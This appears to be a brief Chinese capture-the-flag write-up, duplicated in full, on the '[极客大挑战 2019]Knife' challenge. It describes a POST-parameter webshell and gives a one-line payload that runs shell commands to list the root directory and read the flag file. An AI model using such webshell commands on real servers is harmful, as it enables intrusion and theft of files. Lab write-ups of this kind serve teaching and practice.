[极客大挑战 2019]Knife 1
看页面提示,
就是个POST提交参数的webshell
在源码里可以找到输出结果, 然后就是传统艺能, 到根目录去看看都有啥好玩意儿
flag就在这里了
1 | Syc=system("cd ../../../../../;ls -la;cat flag"); |
看页面提示,
就是个POST提交参数的webshell
在源码里可以找到输出结果, 然后就是传统艺能, 到根目录去看看都有啥好玩意儿
flag就在这里了
1 | Syc=system("cd ../../../../../;ls -la;cat flag"); |